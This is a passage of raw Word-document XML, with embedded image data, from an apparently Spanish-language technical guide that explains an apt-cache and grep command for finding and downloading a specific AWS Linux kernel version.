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&#10;BPGcCGAByNYiDGcJaZJFwMuC/69Q/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VTYUFgAMAAB8IAAAOAAAAAAAAAAAAAAAAADoCAABkcnMvZTJvRG9jLnhtbFBL&#10;AQItAAoAAAAAAAAAIQAntTQjHUUAAB1FAAAUAAAAAAAAAAAAAAAAAOYFAABkcnMvbWVkaWEvaW1h&#10;Z2UxLnBuZ1BLAQItABQABgAIAAAAIQDKkg7L4QAAAAoBAAAPAAAAAAAAAAAAAAAAADVLAABkcnMv&#10;ZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAqiYOvrwAAAAhAQAAGQAAAAAAAAAAAAAAAABDTAAA&#10;ZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAAA2TQAAAAA=&#10;">
                <v:shape id="Imagen 78" o:spid="_x0000_s1056" type="#_x0000_t75" style="position:absolute;width:38703;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nwzAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PSwMx&#10;FMTvQr9DeIIXsdl/rWVtWmSh6EEpbfX+3Dx3l25eliS2q5/eCEKPw8z8hlmuR9OLEznfWVaQThMQ&#10;xLXVHTcK3g6buwUIH5A19pZJwTd5WK8mV0sstT3zjk770IgIYV+igjaEoZTS1y0Z9FM7EEfv0zqD&#10;IUrXSO3wHOGml1mSzKXBjuNCiwNVLdXH/ZdR8Gqr7SH72LiX2f3t4qnKtz/vqVTq5np8fAARaAyX&#10;8H/7WSsoZlmRp/O8gL9L8Q7I1S8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA65158MwA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;">
                  <v:imagedata r:id="rId116" o:title=""/>
                </v:shape>
                <v:shape id="_x0000_s1057" type="#_x0000_t202" style="position:absolute;left:39421;top:431;width:13989;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72aygAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9PS8Mw&#10;FL8LfofwBC/i0rnazbpsjKGgXoZ1l90ezVtTbV5Kkm712xtB8Ph+/99yPdpOnMiH1rGC6SQDQVw7&#10;3XKjYP/xfLsAESKyxs4xKfimAOvV5cUSS+3O/E6nKjYihXAoUYGJsS+lDLUhi2HieuLEHZ23GNPp&#10;G6k9nlO47eRdlhXSYsupwWBPW0P1VzVYBbv8sDM3w/HpbZPP/Ot+2BafTaXU9dW4eQQRaYz/4j/3&#10;i07zF/f5/KHIZlP4/SkBIFc/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJlbvZrKAAAA&#10;4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="356D1757" w14:textId="529B95F8" w:rsidR="00C04AFA" w:rsidRPr="000F4612" w:rsidRDefault="00C04AFA" w:rsidP="00C04AFA">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>13</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="44" w:name="_Toc155782580"/>
                        <w:r w:rsidRPr="00BB11F2">
                          <w:t>Buscando Kernel AWS.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="44"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Esta parte del comando busca en la caché de APT (Advanced Package Tool) todos los paquetes cuyos nombres o descripciones contienen la cadena "linux-image". Los paquetes "linux-image" generalmente se refieren a imágenes del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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9B1250" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Linux para diferentes versiones y configuraciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443535F" w14:textId="18B78029" w:rsidR="009B1250" w:rsidRPr="00403D77" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00403D77">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>| grep 4.15.0-1021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C7F775" w14:textId="6EF62E11" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La salida del primer comando se canaliza (|) al comando grep, que filtra y muestra solo las líneas que contienen la cadena "4.15.0-1021". En este contexto, "4.15.0-1021" probablemente se refiere a una versión específica del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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9B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606D1C4B" w14:textId="58B61807" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Al combinar estos dos comandos, </w:t>
      </w:r>
      <w:r w:rsidRPr="0098259F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo apt-cache search linux-image | grep 4.15.0-1021-aws</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> efectivamente busca y lista todas las versiones de las imágenes del kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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9B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Linux disponibles en los repositorios que coincidan con la versión específica "4.15.0-1021". Este comando es útil para identificar si una versión específica del kernel está disponible para la instalación o actualización en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BF7167" w14:textId="65739112" w:rsidR="002F18FA" w:rsidRPr="009B1250" w:rsidRDefault="002F18FA" w:rsidP="002F18FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="515E0A0B" wp14:editId="6BA116D8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>675281</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5227320" cy="1229360"/>
                <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="108179991" name="Grupo 4"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5227320" cy="1229360"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5399438" cy="1454785"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="218336380" name="Imagen 12"/>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432810" cy="1454785"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="949386924" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3571273" y="379562"/>
                            <a:ext cx="1828165" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="38D613A3" w14:textId="220DC4A4" w:rsidR="00C04AFA" w:rsidRPr="00B26F88" w:rsidRDefault="00C04AFA" w:rsidP="00C04AFA">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>14</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="45" w:name="_Toc155782581"/>
                              <w:r w:rsidRPr="00F1650C">
                                <w:t>Procediendo a descargar</w:t>
                              </w:r>
                              <w:r>
                                <w:t xml:space="preserve"> kernel de aws</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00F1650C">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5E0A0B" id="Grupo 4" o:spid="_x0000_s1058" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:53.15pt;width:411.6pt;height:96.8pt;z-index:251713536;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-width-relative:margin;mso-height-relative:margin" coordsize="53994,14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&#10;adNSix3fPhwTQggh+fSf2mhd/wKvazZb6bfzqL3